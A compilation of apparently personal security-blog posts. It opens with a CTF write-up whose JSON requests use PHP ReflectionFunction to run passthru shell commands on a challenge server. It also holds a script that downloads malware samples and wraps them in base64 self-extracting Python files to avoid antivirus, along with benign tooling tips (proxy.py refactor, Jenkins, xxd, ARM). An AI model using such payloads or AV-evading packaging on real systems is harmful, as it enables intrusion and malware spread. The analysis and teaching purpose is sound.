I noticed that in the first case, params was a dictionary, and in the second case, params was a string. However, based on experimenting with the API manually, I knew that the dictionary wasn't required for the page render. That I could send:

{"c":{"name":"page"},"a":{"name":"render","params":"home"}}    /*render page */

And get a perfectly valid response full of HTML. This made me think that there must be more logic than I was thinking, and maybe there are some features I didn't think about. I knew I could get code execution if I could instantiate a class with parameters before invoking a function. I figured I hadn't really tried adding the parameters. I crafted a new request but with a params variable also in the c variable:

{"c":{"name":"ReflectionFunction","params":"passthru"},"a":{"name":"invoke","params":"ls"}} 

And I got the following response:

INSO.RPC
___THE_FLAG_IS_IN_HERE___
___THE_FLAG_IS_IN_HERE___.save
artists.php
bootstrap.min.css
bootstrap.min.js
classes.php
directors.php
films.php
functions.php
home.php
index.php
jquery-2.1.1.min.js
login.php
logout.php
preload.php

And the winning request:

{"c":{"name":"ReflectionFunction","params":"passthru"},"a":{"name":"invoke","params":"grep -rni . *FLAG*"}} 

___THE_FLAG_IS_IN_HERE___:1:INS{Gotta_L0ve_l33t_serialization_suff!}
___THE_FLAG_IS_IN_HERE___.save:1:INS{}

Other Attack Approaches

I'm not sure I would have solved it without figuring out that classes could take parameters, however I did have some leads that I thought could use some follow up work:

1. ArrayObject::unserialize This method takes a string representing a serialized ArrayObject. I had success getting objects to unserialize but couldn't find a good __wakeup or __destruct candidate. See OWASP for how to take advantage of arbitrary unserialize. If you want to play a challenge related to unserialize, check out Plaid CTF 2014: Kpop (Writeup and Source here). See also Stefan Esser's 2010 Blackhat talk (video) [(slides)][https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf] "Utilizing Code Reuse/ROP Application Exploits" where he discusses how to chain PHP Objects to get from an unserialize to get Arbitrary code execution.
2. Getting ReflectionFunction to work without an initialization variable. This obviously didn't work for something like invoke, but I did have luck with export and I have no idea why. For example, I could send:

{"c":{"name":"ReflectionFunction"},"a":{"name":"export","params":"passthru"}}

and get a response of:

Function [ <internal:standard> function phpinfo ] {

  - Parameters [1] {
    Parameter #0 [ <optional> $what ]
  }
}

However, if I threw

{"c":{"name":"ReflectionFunction"},"a":{"name":"export","params":"passthru"}}

I wouldn't get anything back, and local testing showed an error of:

PHP Warning:  ReflectionFunction::__construct() expects exactly 1 parameter, 0 given in testrf.php on line 28
PHP Fatal error:  ReflectionFunction::invoke(): Internal error: Failed to retrieve the reflection object in testrf.php on line 28

That being said, if anyone has some ideas on how to solve this without using class params hit me up on twitter or email and I'll buy you a beer.

One of my Kali VMs crashed earlier and when I brought it back up and tried to start the Cisco AnyConnect VPN I got the following error:

/opt/cisco/anyconnect# ./bin/vpn connect
Cisco AnyConnect Secure Mobility Client (version 3.1.05187) .

Copyright (c) 2004 - 2013 Cisco Systems, Inc.  All Rights Reserved.


  >> error: VPN Service not available.
    unable to attach to VPN subsystem!

The problem is that the VPN subsytem needs to be started before launching /opt/cisco/anyconnect/bin/vpn or /opt/cisco/anyconnect/bin/vpnui

The VPN subsytem is started with the vpnagentd binary:

/opt/cisco/anyconnect/bin# ./vpnagentd
/opt/cisco/anyconnect/bin# ./vpnui

And after starting /opt/cisco/anyconnect/bin/vpnagentd, everything works as expected.

Over the holiday I've been reading Justin Seitz's book Black Hat Python. The book has a lot of great ideas of how to incorporate Python into Pentesting work. While the ideas in the code are good, and they execute properly, I was disappointed that Seitz doesn't use a lot of the baked in goodies included in Python that can really make code readability and extensibility much better. This post is going to show how I would have written the proxy.py tool Seitz introduces in chapter 2.

As someone who routinely uses Python in my day to day work, I find myself continuously updating and improving older scripts that I wrote a while ago. Two of my favorite modules that help make code extensible are argparse and logging.

argparse was introduced in Python 2.7, so I understand that it can make portability difficult, and therefore you may not want to use it. However, I have found that it is such a strong argument parser and so easy to read that I would rather write my code assuming I can use it, and then backport my code if I have to. argparse has a lot of great features, and almost always, it is going to save you lines of code and make it easier to read and augment your argument handling code. Even better, it has built in support for help and documentation, default values, and optional arguments. I also like that you never have to worry about conditional argument counts.

logging was introduced in Python 2.3, so there is no worry about backwards compatibility. The reason I like the logging module is because it gives fine control over printing logging or debugging information without having to use print statements and global if statements. Additionally, it offers benefits like standard output formatting, the ability to output to console or to a file, and much, much more. I tend to use logging by default, simply because it makes adding a --verbose flag extremely simple.

Overview of changes

Throughout this post we'll look at the following set of changes:

1. Introduced argparse for Argument Parsing
2. Move main() to launch only if actually main, not if module loaded
3. Changed print messages to use logging module
4. Added verbose flag to arguments

1. Introduced argparse for Argument Parsing

As I stated before, I wanted to use argparse instead of parsing sys.argv manually because it makes the code easier to read but will also make it much easier to add optional arguments or parameters should I need to extend the code in the future. Here is the change log created when I added argparse to the original proxy.py:

diff --git a/proxy.py b/proxy.py
index 87ac686..c599111 100644
--- a/proxy.py
+++ b/proxy.py
@@ -1,6 +1,7 @@
 import sys
 import socket
 import threading
+import argparse



@@ -148,31 +149,15 @@ def server_loop(local_host,local_port,remote_host,remote_port,receive_first):

 def main():

-    # no fancy command line parsing here
-    if len(sys.argv[1:]) != 5:
-        print "Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]"
-        print "Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True"
-        sys.exit(0)
-
-    # setup local listening parameters
-    local_host  = sys.argv[1]
-    local_port  = int(sys.argv[2])
-
-    # setup remote target
-    remote_host = sys.argv[3]
-    remote_port = int(sys.argv[4])
-
-    # this tells our proxy to connect and receive data
-    # before sending to the remote host
-    receive_first = sys.argv[5]
-
-    if "True" in receive_first:
-           receive_first = True
-    else:
-           receive_first = False
-
+    parser = argparse.ArgumentParser()
+    parser.add_argument('localhost')
+    parser.add_argument('localport',type=int)
+    parser.add_argument('remotehost')
+    parser.add_argument('remoteport',type=int)
+    parser.add_argument('--receivefirst', action='store_true')
+    args = parser.parse_args()
     # now spin up our listening socket
-    server_loop(local_host,local_port,remote_host,remote_port,receive_first)
+    server_loop(args.localhost, args.localport, args.remotehost, args.remoteport, args.receivefirst)

 main()

The entire argument parsing operation takes place in a few very easy to read lines (shown below). Notice the following:

1. Arguments are named by the add_argument method. After adding the argument to the parser, the arguments can be called as properties from the args variable.
2. Argument types are defined when the argument is added. By default, the type of argument is a string, but by specifying type=int we can tell Argparse to call int(value) when parsing the argument.
3. Optional flags can be specified and given a default value. The -- in --receivefirst tell argparse that receivefirst is an optional flag. action='store_true' means if the flag is not present, the value is False, otherwise, it is True.

import argparse
parser = argparse.ArgumentParser()
parser.add_argument('localhost')
parser.add_argument('localport',type=int)
parser.add_argument('remotehost')
parser.add_argument('remoteport',type=int)
parser.add_argument('--receivefirst', action='store_true')
args = parser.parse_args()

# now spin up our listening socket
server_loop(args.localhost, args.localport, args.remotehost, args.remoteport, args.receivefirst)

The last thing I wanted to point out about argparse is that you get help by default. Look at what happens when you run python proxy.py with no arguments:

$ python proxy.py
usage: proxy.py [-h] [--receivefirst] localhost localport remotehost remoteport
proxy.py: error: too few arguments

Lets say the term localhost may be confusing, we can add a help statement to remind ourselves of what we meant:

parser.add_argument('localhost', help='The local interface to listen on. Usually 127.0.0.1 or 0.0.0.0')

Then when you run python proxy.py --help:

$ python proxy.py --help
usage: proxy.py [-h] [--receivefirst] localhost localport remotehost remoteport

positional arguments:
  localhost       The local interface to listen on. Usually 127.0.0.1 or 0.0.0.0
  localport
  remotehost
  remoteport

optional arguments:
  -h, --help      show this help message and exit
  --receivefirst

2. Move main() to launch only if actually main, not if module loaded

This is a simple change, but it addresses a pet peeve of mine:

diff --git a/proxy.py b/proxy.py
index c599111..97475d1 100644
--- a/proxy.py
+++ b/proxy.py
@@ -160,4 +160,5 @@ def main():
     # now spin up our listening socket
     server_loop(args.localhost, args.localport, args.remotehost, args.remoteport, args.receivefirst)

-main()
+if __name__ == '__main__':
+    main()

As you can see, all I did was move the main() call into the scope of an if statement. This if statement checks to see how the module was loaded. If the proxy.py module was called from the command line (./proxy.py or python proxy.py) then main() is executed. However, if another python module calls import proxy then main() won't execute on the load. This change makes the code more portable since other modules can use it, at no additional cost.

3. Changed print messages to use logging module

The python logging module allows us to distinguish what kind of log message we are sending to the user. logging defines 5 types of messages, in order of importance, DEBUG, INFO, WARNING, ERROR, CRITICAL. The default logging level is WARNING. Anything that is logged as WARNING or above will be displayed to the user. You can change the logging level using logging.basicConfig, which we will do in the last section of this post. In the following diff, you can see that I change most print statements to logging.info. By default this prevents these messages from being printed to the screen. Whenever an error occurs, I use logging.error.

diff --git a/proxy.py b/proxy.py
index 97475d1..723b613 100644
--- a/proxy.py
+++ b/proxy.py
@@ -2,6 +2,7 @@ import sys
 import socket
 import threading
 import argparse
+import logging



@@ -69,11 +70,11 @@ def proxy_handler(client_socket, remote_host, remote_port, receive_first):
                 hexdump(remote_buffer)

                 # send it to our response handler
-       remote_buffer = response_handler(remote_buffer)
+                remote_buffer = response_handler(remote_buffer)

                 # if we have data to send to our local client send it
                 if len(remote_buffer):
-                        print "[<==] Sending %d bytes to localhost." % len(remote_buffer)
+                        logging.info(" [<==] Sending %d bytes to localhost" % len(remote_buffer))
                         client_socket.send(remote_buffer)

    # now let's loop and reading from local, send to remote, send to local
@@ -85,8 +86,8 @@ def proxy_handler(client_socket, remote_host, remote_port, receive_first):


        if len(local_buffer):
-
-           print "[==>] Received %d bytes from localhost." % len(local_buffer)
+
+           logging.info("[==>] Received %d bytes from localhost." % len(local_buffer))
            hexdump(local_buffer)

            # send it to our request handler
@@ -94,7 +95,7 @@ def proxy_handler(client_socket, remote_host, remote_port, receive_first):

            # send off the data to the remote host
            remote_socket.send(local_buffer)
-           print "[==>] Sent to remote."
+           logging.info("[==>] Sent to remote.")


        # receive back the response
@@ -102,7 +103,7 @@ def proxy_handler(client_socket, remote_host, remote_port, receive_first):

        if len(remote_buffer):

-           print "[<==] Received %d bytes from remote." % len(remote_buffer)
+           logging.info("[<==] Received %d bytes from remote." % len(remote_buffer))
            hexdump(remote_buffer)

            # send to our response handler
@@ -111,13 +112,13 @@ def proxy_handler(client_socket, remote_host, remote_port, receive_first):
            # send the response to the local socket
            client_socket.send(remote_buffer)

-           print "[<==] Sent to localhost."
+           logging.info("[<==] Sent to localhost.")

        # if no more data on either side close the connections
        if not len(local_buffer) or not len(remote_buffer):
            client_socket.close()
            remote_socket.close()
-           print "[*] No more data. Closing connections."
+           logging.info("[*] No more data. Closing connections.")

            break

@@ -128,11 +129,11 @@ def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
         try:
                 server.bind((local_host,local_port))
         except:
-                print "[!!] Failed to listen on %s:%d" % (local_host,local_port)
-                print "[!!] Check for other listening sockets or correct permissions."
+                logging.error("[!!] Failed to listen on %s:%d" % (local_host,local_port))
+                logging.error("[!!] Check for other listening sockets or correct permissions.")
                 sys.exit(0)

-        print "[*] Listening on %s:%d" % (local_host,local_port)
+        logging.info("[*] Listening on %s:%d" % (local_host,local_port))


         server.listen(5)
@@ -141,7 +142,7 @@ def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
                 client_socket, addr = server.accept()

                 # print out the local connection information
-                print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])
+                logging.info("[==>] Received incoming connection from %s:%d" % (addr[0],addr[1]))

                 # start a thread to talk to the remote host
                 proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))

4. Added verbose flag to arguments

The last change hides a lot of information from the user when the program is running and lets the screen stay relatively clean. But what if the user wants to see that information? This is why I love argparse and logging so much. With argparse I can easily add a verbose flag, and with logging, all I have to do is change a variable whenever that verbose flag is set. Here is the diff:

diff --git a/proxy.py b/proxy.py
index 723b613..c936f62 100644
--- a/proxy.py
+++ b/proxy.py
@@ -151,12 +151,16 @@ def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
 def main():

     parser = argparse.ArgumentParser()
+    parser.add_argument('--verbose','-v', action='store_true')
     parser.add_argument('localhost')
     parser.add_argument('localport',type=int)
     parser.add_argument('remotehost')
     parser.add_argument('remoteport',type=int)
     parser.add_argument('receivefirst', action='store_true')
     args = parser.parse_args()
+
+    if args.verbose:
+        logging.basicConfig(level=logging.INFO)

     # now spin up our listening socket
     server_loop(args.localhost, args.localport, args.remotehost, args.remoteport, args.receivefirst)

Thats it! A 3 line addition and we can control the verbosity of the output. We can even use the short -v flag instead of specifying --verbose. If we wanted to, we could introduce a format into the basicConfig to add things like Timestamps and debug levels. It is even possible to write different verbosity levels to a file and the console at the same time.

Conclusion

In conclusion, when you're on an engagement, the most important aspect of a piece of code is that it achieves its objective. However, knowing some of these modules is going to make whipping up and modifying code much easier the next time around. While advanced log handling is probably not necessary for a small proxy script, it will come in handy when you start writing advanced plugins to burp or start fooling around with custom protocols in Scapy. You can download the Seitz's code here and buy his book here.

Greetz and thanks to F4C3 for checking this post for errors!

I was working with Jenkins a gitlab server and decided to move the gitlab server to a new IP address. After moving the server, The git plugin for Jenkins crashed and resulted in the following error message:

javax.servlet.ServletException: org.apache.commons.jelly.JellyTagException: jar:file:/var/lib/jenkins/plugins/gitlab-plugin/WEB-INF/lib/gitlab-plugin.jar!/com/dabsquared/gitlabjenkins/GitLabPushTrigger/config.jelly:10:87: <j:invoke> method getProjectBranches threw exception: java.net.NoRouteToHostException: No route to host
    at org.kohsuke.stapler.jelly.JellyFacet$1.dispatch(JellyFacet.java:103)
    at org.kohsuke.stapler.Stapler.tryInvoke(Stapler.java:746)
    at org.kohsuke.stapler.Stapler.invoke(Stapler.java:876)
    at org.kohsuke.stapler.MetaClass$6.doDispatch(MetaClass.java:249)
    at org.kohsuke.stapler.NameBasedDispatcher.dispatch(NameBasedDispatcher.java:53)
    at org.kohsuke.stapler.Stapler.tryInvoke(Stapler.java:746)
    at org.kohsuke.stapler.Stapler.invoke(Stapler.java:876)
    at org.kohsuke.stapler.Stapler.invoke(Stapler.java:649)
    at org.kohsuke.stapler.Stapler.service(Stapler.java:238)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:848)
    at org.eclipse.jetty.servlet.ServletHolder.handle(ServletHolder.java:686)
    at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1494)
    at hudson.util.PluginServletFilter$1.doFilter(PluginServletFilter.java:96)
    at hudson.util.PluginServletFilter.doFilter(PluginServletFilter.java:88)
    at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1482)
    at hudson.security.csrf.CrumbFilter.doFilter(CrumbFilter.java:48)
    at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1482)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:84)
    at hudson.security.UnwrapSecurityExceptionFilter.doFilter(UnwrapSecurityExceptionFilter.java:51)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)
    at jenkins.security.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:117)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)
    at org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)
    at org.acegisecurity.ui.rememberme.RememberMeProcessingFilter.doFilter(RememberMeProcessingFilter.java:142)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)
    at org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:271)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)
    at jenkins.security.BasicHeaderProcessor.doFilter(BasicHeaderProcessor.java:93)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)
    at org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:249)
    at hudson.security.HttpSessionContextIntegrationFilter2.doFilter(HttpSessionContextIntegrationFilter2.java:67)
    at hudson.security.ChainedServletFilter$1.doFilter(ChainedServletFilter.java:87)

I was able to fix this by going to the Jenkins directory at /var/lib/jenkins and running a find and replace between the two IPs:

grep -rlZ 'oldip' /var/lib/jenkins/ | xargs -0 sed -i 's/oldip/newip/g'

Just replace oldip and newip with the correct values, then restart jenkins and you should be all set. I haven't tried but I suspect this works with domain names as well.

I was on malwr.com the other day and I found a sample I thought was interesting. I went to download it and it triggered my antivirus and chrome wouldn't accept the download. A lot of the times, malicious files are saved in encrypted zip files with the password 'infected'. In this case, the malicious file is dropped with no protection or obfuscation. The first solution I had for this problem was to change my networking settings in my virtual machine to allow internet access so that I could download the file. The problem with this approach is it is somewhat time consuming, and I have to remember to change my networking settings when I am done. In addition, I have found VMware to be a bit finicky when changing networking settings.

At first, I wanted to download the file in memory, and then put it into a password protected zip file. This isn't possible, though, because python's zip module does not support the use of passwords when writing zips (but it can use passwords when reading). Using a 3rd party utility wouldn't work either, because it would require writing the malicious file to disk (which would trigger the AV) before actually making the zip file. Because I have python installed on all my analysis VMs, I decided the following approach would work:

1. Download the malicious file in memory
2. Base64 encode the malicious file. This should prevent the new file from matching AV signatures.
3. Write the base64 encoded malicious file to a new python file. The new python file contains the encoded malware as well as functionality to decode and drop the malware

Downloading the malicious file to memory

To download a file over HTTP to memory you can use the urllib2 module.

import urllib2
response = urllib2.urlopen('http://awebsiteyouwanttodownload.com/thefileyouwant.bin')
data = response.read()

Malwr.com is run over HTTPS, and requires you to log in, so while the code above works for most websites, it won't work for us because we have to log in. To download the the malicious file from malwr.com, we can use the mechanize library. Mechanize is not only great at emulating a browser, but also providing hours of frustration as you search the internet for decent documentation. The code I used to download with mechanize is:

import mechanize
browser = mechanize.Browser()
login_url = 'https://malwr.com/account/login/'
browser.open(login_url)
browser.select_form(nr=0)
browser.form['username'] = malwr_username #argument from function
browser.form['password'] = malwr_password #argument from function
#log into the site
browser.submit()
response = browser.response()
response = response.read()
if 'View Profile' not in response:
    print '"View Profile" was not found in the response.'+\
          'Your credentials may not be valid. Here is the response:'
    print response
    return
#'Logged in. Trying to download malicious file...'
response = browser.open(url_to_download)
data = response.read()

Base64 Encoding the File

Base64 Encoding in python is a piece of cake.

import base64
encoded_data = base64.encodestring(data)

Writing a Self-Extracting Python File

I had a few goals for the self extracting python file. First, I wanted to produce the original binary. But I also wanted to put in some protection mechanism so that a user doesn't accidently self extract the file. So I use the following code in my self extracting python file:

def extract():
    import base64
    filename = '%(filename)s'
    filedata = '%(filedata)s'
    f = open(filename,'wb')
    f.write(base64.decodestring(filedata))
    f.close()
if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:
        extract()
    else:
        #prevent accidental double click
        warning = 'Warning, this will drop malware on your machine.'
        warning += 'usage:%%s infectme' %% sys.argv[0]
        print warning
        raw_input('hit enter to close')

This code will be included in the original downloader as a string. That is why there are named substitutions for filename and filedata as well as escaping in the string when printing the warning.

The Malwr.com Downloader Script

Here is my downloader script in its entirety. In its current form, it prompts the user for the malwr.com password and username, but there is no reason why you couldn't hardcode that into the file.

def makeSelfExtracting(url_to_download, malwr_username, malwr_password):
    import base64
    import mechanize
    import urlparse
    import string
    #NB: Do not tab the string below.   
    extract_program = ''+\
'''
def extract():
    import base64
    filename = '%(filename)s'
    filedata = ''+\
    \'''%(filedata)s\'''
    f = open(filename,'wb')
    f.write(base64.decodestring(filedata))
    f.close()
if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:
        extract()
    else:
        warning = 'Warning, this will drop malware on your machine.'
        warning += 'usage:%%s infectme' %% sys.argv[0]
        print warning
        raw_input('hit enter to close')
'''

    filename = 'malware.bin' #default
    parts = urlparse.urlparse(url_to_download)
    if len(parts.path) > 0:
        if '/' in parts.path:
            filename = parts.path
            if filename[-1] == '/':
                filename = filename[:-1]
            filename = filename[filename.rindex('/')+1:]
        else:
            filename = parts.path
    #sanitize unwanted characters and enforce max length
    max_length = 30
    valid_chars = "-_.%s%s" % (string.ascii_letters, string.digits)
    filename = ''.join(c for c in filename if c in valid_chars)[:max_length]

    browser = mechanize.Browser()
    login_url = 'https://malwr.com/account/login/'
    browser.open(login_url)
    browser.select_form(nr=0)
    browser.form['username'] = malwr_username #argument from function
    browser.form['password'] = malwr_password #argument from function

    print 'Trying to log in...'

    browser.submit()
    response = browser.response()
    response = response.read()
    if 'View Profile' not in response:
        print '"View Profile" was not found in the response.'+\
              'Your credentials may not be valid. Here is the response:'
        print response
        return
    print 'Logged in. Trying to download...'
    response = browser.open(url_to_download)
    rawdata = response.read()
    filedata = base64.encodestring(rawdata)



    extract_filename = 'extract_%(filename)s.py' % {'filename' : filename}
    extract_file = open(extract_filename,'wb')
    extract_file.write(extract_program % {'filename':filename, 'filedata':filedata})
    extract_file.close()

    print 'Wrote downloaded file to: %s' % extract_filename

if __name__ == '__main__':
    import getpass
    urlToDownload = raw_input('url: ')
    username = raw_input('username: ')
    password1 = ''
    password2 = ';'
    while password1 != password2:
        password1 = getpass.getpass('Password (will not echo):')
        password2 = getpass.getpass('Password again:')
    makeSelfExtracting(urlToDownload,username,password1)
    raw_input('Hanging out!')

I've been working through Violent Python this weekend and ran into a problem with mechanize. The book lists the following code:

import mechanize
def viewPage(url):
    browser = mechanize.Browser()
    page = browser.open(url)
    source_code = page.read()
    print source_code
viewPage('http://www.syngress.com')

I, however, used the following sample code:

>>> import mechanize
>>> def viewPage(url):
    browser = mechanize.Browser()
    page = browser.open(url)
    source_code = page.read()
    print source_code

>>> viewPage('www.google.com')

Traceback (most recent call last):
  File "<pyshell#8>", line 1, in <module>
    viewPage('www.google.com')
  File "<pyshell#7>", line 3, in viewPage
    page = browser.open(url)
  File "build\bdist.win32\egg\mechanize\_mechanize.py", line 203, in open
    return self._mech_open(url, data, timeout=timeout)
  File "build\bdist.win32\egg\mechanize\_mechanize.py", line 216, in _mech_open
    "can't fetch relative reference: "
BrowserStateError: can't fetch relative reference: not viewing any document

The difference, of course is that I didn't put the 'http' in front of the url. Thus, if you happen to get the error "BrowserStateError: can't fetch relative reference: not viewing any document", be sure that the protocol is included in the url.

Note: [update] I wrote this post a while ago, prior to learning about dd. This post provides a good example of how to use dd. And the challnge is fun.

I was recently working with xxd when I needed to remove the first 0x1410 bytes from a file. It turns out, you can do this by using the command:

xxd -s -0x1410 -r out2.hex > out2.raw

A bit longer explanation is below.

Lets say you have a text file called sample.text:

user@computer:~/workspace$ xxd sample.text 
0000000: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000010: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000020: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000030: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000040: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000050: 8383 8383 8383 8383 8383 6162 6364 6162  ..........abcdab
0000060: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000070: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000080: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000090: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
00000a0: 6364 6162 6364 6162 6364 0a              cdabcdabcd.

All those pesky 0x83s are in the way and screwing up trying to render in vim or less. So lets write to a hex file, and start trimming up:

user@computer:~/workspace$ xxd sample.text > sample.hex
user@computer:~/workspace$ cat sample.hex
0000000: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000010: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000020: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000030: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000040: 8383 8383 8383 8383 8383 8383 8383 8383  ................
0000050: 8383 8383 8383 8383 8383 6162 6364 6162  ..........abcdab
0000060: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000070: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000080: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000090: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
00000a0: 6364 6162 6364 6162 6364 0a              cdabcdabcd.

Now, use your favorite editor to remove from 0x00 through 0x50. Now this method only seems to work for every 16 bytes, so we'll have to manually replace 0x50 through 0x5A with a printable character, but 15 maximum edits isn't so bad.

user@computer:~/workspace$ cat sample.hex
0000050: 2020 2020 2020 2020 2020 6162 6364 6162  ..........abcdab
0000060: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000070: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000080: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
0000090: 6364 6162 6364 6162 6364 6162 6364 6162  cdabcdabcdabcdab
00000a0: 6364 6162 6364 6162 6364 0a              cdabcdabcd.

Finally, run xxd again, this time using the reverse seek (see the xxd man pages for more info).

remnux@remnux:~/workspace$ xxd -r -s -0x50 sample.hex
          abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd

Like I mentioned before, there seems to be a problem with seeking when address mod 16 != 0. If you have a way to get around that, feel free to leave a comment below.

I wanted to play with some ARM over the weekend, but unlike x86, I don't have an arm development environment. I'll need a way to compile arm binaries within x86 and then test them out on an ARM device. One easy (and free) solution for this is to write the assembly in linux, cross compiled for ARM, and then test the code inside the Android Emulator. The Android Emulator is a full emulator, and so it not only gives developers the ability to test their Java code, but also any native ARM code they developed for Android.

Steps:

1. Setting up the Development Environment
2. Writing helloarm assembly file
3. Assemble and Link helloarm into executable
4. Test helloarm in the Android Emulator

Setting up the Development Environment

Writing helloarm assembly file

        .syntax unified
.data
message:
        .asciz "Hello, world.\n"
len = . - message
.text
        .global _start
_start:
        mov     r0, $1
        ldr     r1, =message
        ldr     r2, =len
        mov     r7, $4
        swi     $0

        mov     r0, $0
        mov     r7, $1
        swi     $0      

Assemble and Link helloarm into executable

$ ~/tools/android/android-ndk-r6b/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-as -o helloworld.S helloworld.s
$ ~/tools/android/android-ndk-r6b/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-ld -o helloworld.exe helloworld.S

Test your new executable on the emulator

$ emulator -avd Android21 &
[1] 16467

# adb -e shell will let you execute any command on the device
abd -e shell "mkdir /data/data/test"
adb -e push "helloworld.exe /data/data/test"
# need to set permissions for execution
adb -e shell "chmod 777 /data/data/test/helloworld.exe"
# lets try to execute
adb -e shell "/data/data/helloworld.exe"
Hello, world.

References

• Hello World in ARM Assembly
• Hello World In (ARM) Assembly

A while back I received an email from a friend of mine which had a PDF attachment. Given that the email body was blank and the "report" was unsolicited, I assumed my friend's email had been compromised and that the PDF was malicious. Wanting to examine the PDF later, I found that google recognized that the file was malicious and would not allow me to download it. Instead it gave me only options to "View" or "Learn more". If you click view, a message appears that says "virus found" and "learn more" takes you to this page.
But, we can still get the file from the original text of the email. Click the drop down arrow attached to the reply button and select "show original". Scrolling down a bit in the original message you'll see a section that looks like this:

--f46d0444ef637df04804b6e6fc01
Content-Type: application/pdf; name="744810.pdf"
Content-Disposition: attachment; filename="744810.pdf"
Content-Transfer-Encoding: base64
X-Attachment-Id: file0

JVBERi0xLjYKJeLjz9MNCjEgMCBvYmoNCjw8L1R5cGUvUGFnZS9QYXJlbnQgNSAwIFIgL01lZGlh
Qm94IFswIDAgNjQwIDQ4MF0vQ29udGVudHMgNiAwIFIgL1Jlc291cmNlcyA3IDAgUj4+DQplbmRv
JSVFT0YNCg==
--f46d0444ef637df04804b6e6fc01--

The sample above has been blatantly cut down to conserve space, but the first two lines and the last two lines of the attachment are shown. The part that is interesting is the base64 encoding and the text starting on line 7 and ending on line 9. This is the base64 encoding of the file. A trivial method of decoding this string would be to fire up python, and decode using the base64 module:

>>> import base64
>>> raw = base64.decodestring('JVBERi0xLjYKJeLjz9MNCjEgMCBvYmoNCjw8L1R5cGUvUGFnZS9QYXJlbnQgNSAwIFIgL01lZGlhQm94IFswIDAgNjQwIDQ4MF0vQ29udGVudHMgNiAwIFIgL1Jlc291cmNlcyA3IDAgUj4+DQplbmRvJSVFT0YNCg==')
>>> raw
'%PDF-1.6\n%\xe2\xe3\xcf\xd3\r\n1 0 obj\r\n<</Type/Page/Parent 5 0 R /MediaBox [0 0 640 480]/Contents 6 0 R /Resources 7 0 R>>\r\nendo%%EOF\r\n'

A simple script to do this automatically would look like this:

#simpledecode.py
import sys
def decode(filein, fileout):
    import base64
    emailFile = open(filein,'r')
    rawfile = open(fileout,'wb')
    while(True):
        line = emailFile.readline()
        if line == "":
            break
        raw = line.strip()
        try:
            rawfile.write(base64.decodestring(raw))
        except:
            print "Incorrect Padding: "+ line
            raise

    print "wrote file: " + fileout
    rawfile.close()

if __name__ == '__main__':
    if len(sys.argv) == 3:
        decode(sys.argv[1],sys.argv[2])
    else:
        print "simpledecode.py fileIn fileOut"
        print "fileIn should be the base64 MIME encoded string"

simpledecode.py is supplied a text file with the base64 encoded file. So all you would need to do is copy the first base64 encoded section of the file (lines 7-9 in the original sample above) into a new text file and supply that as the first argument to simpledecode.py. The second argument is where you want the extracted file to be saved.

In order to make it a little bit simpler to extract the files, I wrote a python program with a bit more sophistication. This script needs only a file of the original email text to access. That is, when you view the original source of the email, hit ctrl-a to select the entire file, and then copy and paste it into a text file. Then supply that file as the argument to the script below. By default, the script will save the attachment to the filename that is included with the attachment. You can also supply your own filename, and if there are multiple attachments they will be written out with a number attached.

#emailextract.py
import sys
def processMIME(emailMessageFile,outputFile=None):
    '''
    Takes a MIME extended email and extracts the attachments

    emailMessageFile - a file containing the plaintext email in MIME format
    outputFile - Where to place the new file (if not keeping the original name)

